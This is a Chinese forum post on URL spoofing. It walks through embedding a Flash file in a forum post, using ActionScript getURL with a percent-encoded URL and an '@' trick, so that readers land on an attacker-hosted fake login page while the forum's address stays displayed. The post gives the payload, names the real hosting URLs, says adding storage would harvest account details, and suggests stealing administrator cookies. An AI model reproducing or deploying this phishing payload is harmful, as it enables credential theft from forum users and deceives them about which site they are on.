配合本站发布的URL欺骗的方法一文特发此文:
测试论坛:第八军团论坛[只是测试一下页己,勿怪:)]
现在的论坛大多都允许发FLASH文件。
利用:
制作一个FLASH文件,在第一帧设置动作:
stop();
a="http://www.juntuan.net�@%77%77%77%2E%67%78%67%6C%2E%63%6F%6D/%74%65%73%74/%6C%6F%67%69%6E%2E%70%68%70";
getURL(a);
输出为test.swf
制作一个页面逼真的论坛登录界面。把其和test.swf一起上传到自己的空间上。
我做好的swf文件存在
http://www.gxgl.com/test/test.swf
登录界面是
http://www.gxgl.com/test/login.php 声明:这个文件只是测试用,并未加上其它功能。
然后到第八军团论坛发表贴子。测试!
点击flash图标,填入http://www.gxgl.com/test/test.swf
然后找到这个贴子点击查看。
就会把浏览者指引到http://www.gxgl.com/test/login.php来了,而地址栏却仍是第八军团的地址。
浏览都会误以为本贴要登录才能查看,一般都会输入帐号信息登录。如果在这个文件加上存储功能,那么该浏览者的帐号信息就到手了。
-----------------------------------------------------------------
面对现在论坛的这个问题。可利用的还很多,只要你对JAVASCRIPT和AS熟悉,取管理员COOKIES,其它恶作剧等等都可轻易实现。
|
论坛用户
论坛: 菜鸟乐园 标题: URL欺骗之论坛应用篇